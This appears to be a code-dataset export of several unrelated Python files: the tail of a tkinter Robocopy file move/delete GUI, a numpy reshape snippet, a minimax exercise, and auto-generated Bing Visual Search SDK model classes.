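# root.after(); the slot's button and Del_All are re-enabled once the worker
# finishes.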
def schedule_check_Del_1(Patch_1_Thread):
root.after(1000, check_if_done_Del_1, Patch_1_Thread)
def check_if_done_Del_1(Patch_1_Thread):
if not Patch_1_Thread.is_alive():
Btn_Del_1["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_1(Patch_1_Thread)
def Delete_Module_1_Thread():
Btn_Del_1["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_1_Thread = threading.Thread(target=Delete_Module_1)
Patch_1_Thread.start()
schedule_check_Del_1(Patch_1_Thread)
def schedule_check_Del_2(Patch_2_Thread):
root.after(1000, check_if_done_Del_2, Patch_2_Thread)
def check_if_done_Del_2(Patch_2_Thread):
if not Patch_2_Thread.is_alive():
Btn_Del_2["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_2(Patch_2_Thread)
def Delete_Module_2_Thread():
Btn_Del_2["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_2_Thread = threading.Thread(target=Delete_Module_2)
Patch_2_Thread.start()
schedule_check_Del_2(Patch_2_Thread)
def schedule_check_Del_3(Patch_3_Thread):
root.after(1000, check_if_done_Del_3, Patch_3_Thread)
def check_if_done_Del_3(Patch_3_Thread):
if not Patch_3_Thread.is_alive():
Btn_Del_3["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_3(Patch_3_Thread)
def Delete_Module_3_Thread():
Btn_Del_3["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_3_Thread = threading.Thread(target=Delete_Module_3)
Patch_3_Thread.start()
schedule_check_Del_3(Patch_3_Thread)
def schedule_check_Del_4(Patch_4_Thread):
root.after(1000, check_if_done_Del_4, Patch_4_Thread)
def check_if_done_Del_4(Patch_4_Thread):
if not Patch_4_Thread.is_alive():
Btn_Del_4["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_4(Patch_4_Thread)
def Delete_Module_4_Thread():
Btn_Del_4["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_4_Thread = threading.Thread(target=Delete_Module_4)
Patch_4_Thread.start()
schedule_check_Del_4(Patch_4_Thread)
def schedule_check_Del_5(Patch_5_Thread):
root.after(1000, check_if_done_Del_5, Patch_5_Thread)
def check_if_done_Del_5(Patch_5_Thread):
if not Patch_5_Thread.is_alive():
Btn_Del_5["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_5(Patch_5_Thread)
def Delete_Module_5_Thread():
Btn_Del_5["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_5_Thread = threading.Thread(target=Delete_Module_5)
Patch_5_Thread.start()
schedule_check_Del_5(Patch_5_Thread)
def schedule_check_Del_6(Patch_6_Thread):
root.after(1000, check_if_done_Del_6, Patch_6_Thread)
def check_if_done_Del_6(Patch_6_Thread):
if not Patch_6_Thread.is_alive():
Btn_Del_6["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_6(Patch_6_Thread)
def Delete_Module_6_Thread():
Btn_Del_6["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_6_Thread = threading.Thread(target=Delete_Module_6)
Patch_6_Thread.start()
schedule_check_Del_6(Patch_6_Thread)
def schedule_check_Del_7(Patch_7_Thread):
root.after(1000, check_if_done_Del_7, Patch_7_Thread)
def check_if_done_Del_7(Patch_7_Thread):
if not Patch_7_Thread.is_alive():
Btn_Del_7["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_7(Patch_7_Thread)
def Delete_Module_7_Thread():
Btn_Del_7["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_7_Thread = threading.Thread(target=Delete_Module_7)
Patch_7_Thread.start()
schedule_check_Del_7(Patch_7_Thread)
def schedule_check_Del_8(Patch_8_Thread):
root.after(1000, check_if_done_Del_8, Patch_8_Thread)
def check_if_done_Del_8(Patch_8_Thread):
if not Patch_8_Thread.is_alive():
Btn_Del_8["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_8(Patch_8_Thread)
def Delete_Module_8_Thread():
Btn_Del_8["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_8_Thread = threading.Thread(target=Delete_Module_8)
Patch_8_Thread.start()
schedule_check_Del_8(Patch_8_Thread)
def schedule_check_Del_9(Patch_9_Thread):
root.after(1000, check_if_done_Del_9, Patch_9_Thread)
def check_if_done_Del_9(Patch_9_Thread):
if not Patch_9_Thread.is_alive():
Btn_Del_9["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_9(Patch_9_Thread)
def Delete_Module_9_Thread():
Btn_Del_9["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_9_Thread = threading.Thread(target=Delete_Module_9)
Patch_9_Thread.start()
schedule_check_Del_9(Patch_9_Thread)
def schedule_check_Del_10(Patch_10_Thread):
root.after(1000, check_if_done_Del_10, Patch_10_Thread)
def check_if_done_Del_10(Patch_10_Thread):
if not Patch_10_Thread.is_alive():
Btn_Del_10["state"] = "normal"
Del_All["state"] = "normal"
else:
schedule_check_Del_10(Patch_10_Thread)
def Delete_Module_10_Thread():
Btn_Del_10["state"] = "disabled"
Del_All["state"] = "disabled"
Patch_10_Thread = threading.Thread(target=Delete_Module_10)
Patch_10_Thread.start()
schedule_check_Del_10(Patch_10_Thread)
# END_DELETE_THREADS
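# A hedged sketch (hypothetical helper, unused): the ten launcher/poller pairs
# above vary only in the button and target, so one closure-based factory would
# cover them all. Del_All and root are the module-level names defined elsewhere
# in this file.
def make_threaded_launcher(button, target):
    def check_if_done(worker):
        if not worker.is_alive():
            button["state"] = "normal"
            Del_All["state"] = "normal"
        else:
            root.after(1000, check_if_done, worker)
    def launch():
        button["state"] = "disabled"
        Del_All["state"] = "disabled"
        worker = threading.Thread(target=target)
        worker.start()
        root.after(1000, check_if_done, worker)
    return launch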
Change_Del = ttk.Button(Move_Frame, text="Delete Files ->",
command=lambda: raise_frame(Delete_Menu_Screen))
Change_Del.place(x=570, y=572)
Change_Move = ttk.Button(Delete_Frame, text=" <-Return",
command=lambda: raise_frame(Move_Screen))
Change_Move.place(x=480, y=572)
btnFind5 = ttk.Button(Move_Frame, text="Start All", command=lambda: [Move_1_Thread(), Move_2_Thread(), Move_3_Thread(
), Move_4_Thread(), Move_5_Thread(), Move_6_Thread(), Move_7_Thread(), Move_8_Thread(), Move_9_Thread(), Move_10_Thread()])
btnFind5.place(x=480, y=572)
Del_All = ttk.Button(Delete_Frame, text="Delete all", command=lambda: [Delete_Module_1_Thread(), Delete_Module_2_Thread(), Delete_Module_3_Thread(
), Delete_Module_4_Thread(), Delete_Module_5_Thread(), Delete_Module_6_Thread(), Delete_Module_7_Thread(), Delete_Module_8_Thread(), Delete_Module_9_Thread(), Delete_Module_10_Thread()])
Del_All.place(x=570, y=572)
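# "Start All" / "Delete all" simply fire all ten per-slot worker threads at
# once; each worker re-enables its own button (and Del_All) when it finishes.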
# MOVE BUTTONS
Btn_Move_1 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_1_Thread()])
Btn_Move_1.place(x=193, y=77)
Btn_Move_2 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_2_Thread()])
Btn_Move_2.place(x=193, y=190)
Btn_Move_3 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_3_Thread()])
Btn_Move_3.place(x=193, y=305)
Btn_Move_4 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_4_Thread()])
Btn_Move_4.place(x=193, y=424)
Btn_Move_5 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_5_Thread()])
Btn_Move_5.place(x=193, y=540)
Btn_Move_6 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_6_Thread()])
Btn_Move_6.place(x=778, y=77)
Btn_Move_7 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_7_Thread()])
Btn_Move_7.place(x=778, y=190)
Btn_Move_8 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_8_Thread()])
Btn_Move_8.place(x=778, y=305)
Btn_Move_9 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_9_Thread()])
Btn_Move_9.place(x=778, y=424)
Btn_Move_10 = ttk.Button(Move_Frame, style="flat.TButton",
text="Start", command=lambda: [Move_10_Thread()])
Btn_Move_10.place(x=785, y=540)
# END MOVE BUTTONS
# DEL BUTTONS
Btn_Del_1 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_1_Thread()])
Btn_Del_1.place(x=193, y=50)
Btn_Del_2 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_2_Thread()])
Btn_Del_2.place(x=193, y=160)
Btn_Del_3 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_3_Thread()])
Btn_Del_3.place(x=193, y=277)
Btn_Del_4 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_4_Thread()])
Btn_Del_4.place(x=193, y=396)
Btn_Del_5 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_5_Thread()])
Btn_Del_5.place(x=193, y=512)
Btn_Del_6 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_6_Thread()])
Btn_Del_6.place(x=778, y=50)
Btn_Del_7 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_7_Thread()])
Btn_Del_7.place(x=778, y=160)
Btn_Del_8 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_8_Thread()])
Btn_Del_8.place(x=778, y=277)
Btn_Del_9 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_9_Thread()])
Btn_Del_9.place(x=778, y=396)
Btn_Del_10 = ttk.Button(Delete_Frame, style="flat.TButton",
text=" Delete", command=lambda: [Delete_Module_10_Thread()])
Btn_Del_10.place(x=785, y=512)
# END DEL BUTTONS
raise_frame(Move_Screen)
root.mainloop()
os.system('taskkill /f /im Robocopy.exe')
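# After the main loop exits, stray Robocopy processes are killed and every
# field's current value is written back to config.ini below, section by
# section, so the UI reopens with the same paths, names and extensions.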
# START_MOVE_PATHS_NAMES
parser.set("Path_Names", "path_name_1", Move_Module_Name_1.get())
parser.set("Path_Names", "path_name_2", Move_Module_Name_2.get())
parser.set("Path_Names", "path_name_3", Move_Module_Name_3.get())
parser.set("Path_Names", "path_name_4", Move_Module_Name_4.get())
parser.set("Path_Names", "path_name_5", Move_Module_Name_5.get())
parser.set("Path_Names", "path_name_6", Move_Module_Name_6.get())
parser.set("Path_Names", "path_name_7", Move_Module_Name_7.get())
parser.set("Path_Names", "path_name_8", Move_Module_Name_8.get())
parser.set("Path_Names", "path_name_9", Move_Module_Name_9.get())
parser.set("Path_Names", "path_name_10", Move_Module_Name_10.get())
# END_MOVE_PATHS_NAMES
# START_SRC_MOVE_PATHS
parser.set("Paths_Src", "path_1", Src_Path_1.get())
parser.set("Paths_Src", "path_2", Src_Path_2.get())
parser.set("Paths_Src", "path_3", Src_Path_3.get())
parser.set("Paths_Src", "path_4", Src_Path_4.get())
parser.set("Paths_Src", "path_5", Src_Path_5.get())
parser.set("Paths_Src", "path_6", Src_Path_6.get())
parser.set("Paths_Src", "path_7", Src_Path_7.get())
parser.set("Paths_Src", "path_8", Src_Path_8.get())
parser.set("Paths_Src", "path_9", Src_Path_9.get())
parser.set("Paths_Src", "path_10", Src_Path_10.get())
# END_SRC_MOVE_PATHS
# START_DST_MOVE_PATHS
parser.set("Paths_Dst", "path_1", Dst_Path_1.get())
parser.set("Paths_Dst", "path_2", Dst_Path_2.get())
parser.set("Paths_Dst", "path_3", Dst_Path_3.get())
parser.set("Paths_Dst", "path_4", Dst_Path_4.get())
parser.set("Paths_Dst", "path_5", Dst_Path_5.get())
parser.set("Paths_Dst", "path_6", Dst_Path_6.get())
parser.set("Paths_Dst", "path_7", Dst_Path_7.get())
parser.set("Paths_Dst", "path_8", Dst_Path_8.get())
parser.set("Paths_Dst", "path_9", Dst_Path_9.get())
parser.set("Paths_Dst", "path_10", Dst_Path_10.get())
# END_DST_MOVE_PATHS
# START_MOVE_EXTENSIONS
parser.set("Extensions", "Search_1", Module_1_Extensions.get())
parser.set("Extensions", "Search_2", Module_2_Extensions.get())
parser.set("Extensions", "Search_3", Module_3_Extensions.get())
parser.set("Extensions", "Search_4", Module_4_Extensions.get())
parser.set("Extensions", "Search_5", Module_5_Extensions.get())
parser.set("Extensions", "Search_6", Module_6_Extensions.get())
parser.set("Extensions", "Search_7", Module_7_Extensions.get())
parser.set("Extensions", "Search_8", Module_8_Extensions.get())
parser.set("Extensions", "Search_9", Module_9_Extensions.get())
parser.set("Extensions", "Search_10", Module_10_Extensions.get())
# END_MOVE_EXTENSIONS
# START_DELETE_PATHS_NAMES
parser.set("Path_Names_2", "path_name_1", Path_Name_Del_1.get())
parser.set("Path_Names_2", "path_name_2", Path_Name_Del_2.get())
parser.set("Path_Names_2", "path_name_3", Path_Name_Del_3.get())
parser.set("Path_Names_2", "path_name_4", Path_Name_Del_4.get())
parser.set("Path_Names_2", "path_name_5", Path_Name_Del_5.get())
parser.set("Path_Names_2", "path_name_6", Path_Name_Del_6.get())
parser.set("Path_Names_2", "path_name_7", Path_Name_Del_7.get())
parser.set("Path_Names_2", "path_name_8", Path_Name_Del_8.get())
parser.set("Path_Names_2", "path_name_9", Path_Name_Del_9.get())
parser.set("Path_Names_2", "path_name_10", Path_Name_Del_10.get())
# END_DELETE_PATHS_NAMES
# START_SRC_DELETE_PATHS
parser.set("Paths_Src_2", "path_1", Src_Del_Path.get())
parser.set("Paths_Src_2", "path_2", Src_Del_Path_2.get())
parser.set("Paths_Src_2", "path_3", Src_Del_Path_3.get())
parser.set("Paths_Src_2", "path_4", Src_Del_Path_4.get())
parser.set("Paths_Src_2", "path_5", Src_Del_Path_5.get())
parser.set("Paths_Src_2", "path_6", Src_Del_Path_6.get())
parser.set("Paths_Src_2", "path_7", Src_Del_Path_7.get())
parser.set("Paths_Src_2", "path_8", Src_Del_Path_8.get())
parser.set("Paths_Src_2", "path_9", Src_Del_Path_9.get())
parser.set("Paths_Src_2", "path_10", Src_Del_Path_10.get())
# END_SRC_DELETE_PATHS
# START_DELETE_EXTENSIONS
parser.set("Extensions_2", "Search_1", Del_Extensions_1.get())
parser.set("Extensions_2", "Search_2", Del_Extensions_2.get())
parser.set("Extensions_2", "Search_3", Del_Extensions_3.get())
parser.set("Extensions_2", "Search_4", Del_Extensions_4.get())
parser.set("Extensions_2", "Search_5", Del_Extensions_5.get())
parser.set("Extensions_2", "Search_6", Del_Extensions_6.get())
parser.set("Extensions_2", "Search_7", Del_Extensions_7.get())
parser.set("Extensions_2", "Search_8", Del_Extensions_8.get())
parser.set("Extensions_2", "Search_9", Del_Extensions_9.get())
parser.set("Extensions_2", "Search_10", Del_Extensions_10.get())
# END_DELETE_EXTENSIONS
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
| [end of row: per-file statistics and quality-signal columns omitted]
| [next dataset row, quality-signal columns omitted]
| hexsha: 4d2cb4d1d4cc023a0d4070cae391a7b262a9e4eb | size: 544 | ext: py | lang: Python
| path: notebook/numpy_1d_to_2d.py | repo: vhn0912/python-snippets (MIT) | head: 80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
| stars: 174 (2018-05-30 to 2022-03-25) | issues: 5 (2019-08-10 to 2021-07-12) | forks: 53 (2018-04-27 to 2022-03-25)
import numpy as np
a = np.arange(6)
print(a)
# [0 1 2 3 4 5]
print(a.reshape(2, 3))
# [[0 1 2]
# [3 4 5]]
print(a.reshape(-1, 3))
# [[0 1 2]
# [3 4 5]]
print(a.reshape(2, -1))
# [[0 1 2]
# [3 4 5]]
# print(a.reshape(3, 4))
# ValueError: cannot reshape array of size 6 into shape (3,4)
# print(a.reshape(-1, 4))
# ValueError: cannot reshape array of size 6 into shape (4)
l = [0, 1, 2, 3, 4, 5]
print(np.array(l).reshape(-1, 3).tolist())
# [[0, 1, 2], [3, 4, 5]]
print(np.array(l).reshape(3, -1).tolist())
# [[0, 1], [2, 3], [4, 5]]
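# A short addendum (not in the original snippet): reshape() returns a view
# when it can, so writing through the reshaped array mutates the original.
a_2d = a.reshape(2, 3)
a_2d[0, 0] = 100
print(a)
# [100   1   2   3   4   5]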
| [end of row: per-file statistics and quality-signal columns omitted]
| [next dataset row, quality-signal columns omitted]
| hexsha: 4d947a0b167d9de255a54dc5be6979955989f1a7 | size: 998 | ext: py | lang: Python
| path: Projects/GameClass Coding Exercise/minimax_helper.py | repo: echen805/AIND (MIT) | head: 969b4cad97ddbf7841c79dad862d4d1142825565
| stars: null | issues: null | forks: null
def min_value(gameState):
""" Return the game state utility if the game is over,
otherwise return the minimum value over all legal successors
# HINT: Assume that the utility is ALWAYS calculated for
player 1, NOT for the "active" player
"""
# TODO: finish this function!
if gameState.terminal_test():
return gameState.utility(0)
v = float("inf")
for a in gameState.actions():
v = min(v, max_value(gameState.result(a)))
return v
def max_value(gameState):
""" Return the game state utility if the game is over,
otherwise return the maximum value over all legal successors
# HINT: Assume that the utility is ALWAYS calculated for
player 1, NOT for the "active" player
"""
# TODO: finish this function!
if gameState.terminal_test():
return gameState.utility(0)
v = float("-inf")
for a in gameState.actions():
v = max(v, min_value(gameState.result(a)))
return v
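# A hedged usage sketch (not part of the exercise file): a top-level decision
# rule that picks the action whose successor has the best min_value for
# player 1, assuming the same gameState interface used above.
def minimax_decision(gameState):
    """ Return the action that maximizes the minimum value the opponent
    can force, i.e. one ply of minimax from the root state. """
    return max(gameState.actions(),
               key=lambda a: min_value(gameState.result(a)))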
| [end of row: per-file statistics and quality-signal columns omitted]
| [next dataset row, quality-signal columns omitted]
| hexsha: 151829b2983743fbbaa34d611b1b2854c61eaf08 | size: 110,488 | ext: py | lang: Python
| path: sdk/VisualSearch/visual_search_client/models/_models.py | repo: WMRamadan/bing-search-sdk-for-python (MIT) | head: 276d9cd6963c939081b3dec91bdd9aded42b3b35
| stars: 12 (2021-03-11 to 2022-02-10) | issues: null | forks: 10 (2021-03-09 to 2022-02-12)
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator (autorest: 3.0.6320, generator: {generator})
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class ResponseBase(msrest.serialization.Model):
"""Response base.
:param type:
:type type: str
"""
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResponseBase, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
class Identifiable(ResponseBase):
"""Defines the identity of a resource.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Identifiable, self).__init__(**kwargs)
self.id = None
class Response(Identifiable):
"""Defines a response. All schemas that return at the root of the response must inherit from this object.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Response, self).__init__(**kwargs)
self.read_link = None
self.web_search_url = None
class Thing(Response):
"""Defines a thing.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Thing, self).__init__(**kwargs)
self.name = None
self.url = None
self.image = None
self.description = None
self.alternate_name = None
self.bing_id = None
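# A hedged usage note (not in the generated file): msrest models are usually
# built from service responses via the Model.deserialize classmethod, which
# maps the wire keys in _attribute_map (such as "webSearchUrl") onto the
# Python-side attributes; "readonly" affects serialization only, so readonly
# fields are still populated on deserialization. For example:
# thing = Thing.deserialize({"_type": "Thing", "name": "Example",
#                            "webSearchUrl": "https://www.bing.com/..."})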
class CreativeWork(Thing):
"""The most generic kind of creative work, including books, movies, photographs, software programs, etc.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CreativeWork, self).__init__(**kwargs)
self.thumbnail_url = None
self.provider = None
self.date_published = None
self.text = None
class Action(CreativeWork):
"""Defines an action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Action, self).__init__(**kwargs)
self.result = None
self.display_name = None
self.is_top_action = None
self.service_url = None
class Offer(Thing):
"""Defines a merchant's offer.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar seller: Seller for this offer.
:vartype seller: ~visual_search_client.models.Thing
:ivar price: The item's price.
:vartype price: float
:ivar price_currency: The monetary currency. For example, USD. Possible values include: "USD",
"CAD", "GBP", "EUR", "COP", "JPY", "CNY", "AUD", "INR", "AED", "AFN", "ALL", "AMD", "ANG",
"AOA", "ARS", "AWG", "AZN", "BAM", "BBD", "BDT", "BGN", "BHD", "BIF", "BMD", "BND", "BOB",
"BOV", "BRL", "BSD", "BTN", "BWP", "BYR", "BZD", "CDF", "CHE", "CHF", "CHW", "CLF", "CLP",
"COU", "CRC", "CUC", "CUP", "CVE", "CZK", "DJF", "DKK", "DOP", "DZD", "EGP", "ERN", "ETB",
"FJD", "FKP", "GEL", "GHS", "GIP", "GMD", "GNF", "GTQ", "GYD", "HKD", "HNL", "HRK", "HTG",
"HUF", "IDR", "ILS", "IQD", "IRR", "ISK", "JMD", "JOD", "KES", "KGS", "KHR", "KMF", "KPW",
"KRW", "KWD", "KYD", "KZT", "LAK", "LBP", "LKR", "LRD", "LSL", "LYD", "MAD", "MDL", "MGA",
"MKD", "MMK", "MNT", "MOP", "MRO", "MUR", "MVR", "MWK", "MXN", "MXV", "MYR", "MZN", "NAD",
"NGN", "NIO", "NOK", "NPR", "NZD", "OMR", "PAB", "PEN", "PGK", "PHP", "PKR", "PLN", "PYG",
"QAR", "RON", "RSD", "RUB", "RWF", "SAR", "SBD", "SCR", "SDG", "SEK", "SGD", "SHP", "SLL",
"SOS", "SRD", "SSP", "STD", "SYP", "SZL", "THB", "TJS", "TMT", "TND", "TOP", "TRY", "TTD",
"TWD", "TZS", "UAH", "UGX", "UYU", "UZS", "VEF", "VND", "VUV", "WST", "XAF", "XCD", "XOF",
"XPF", "YER", "ZAR", "ZMW".
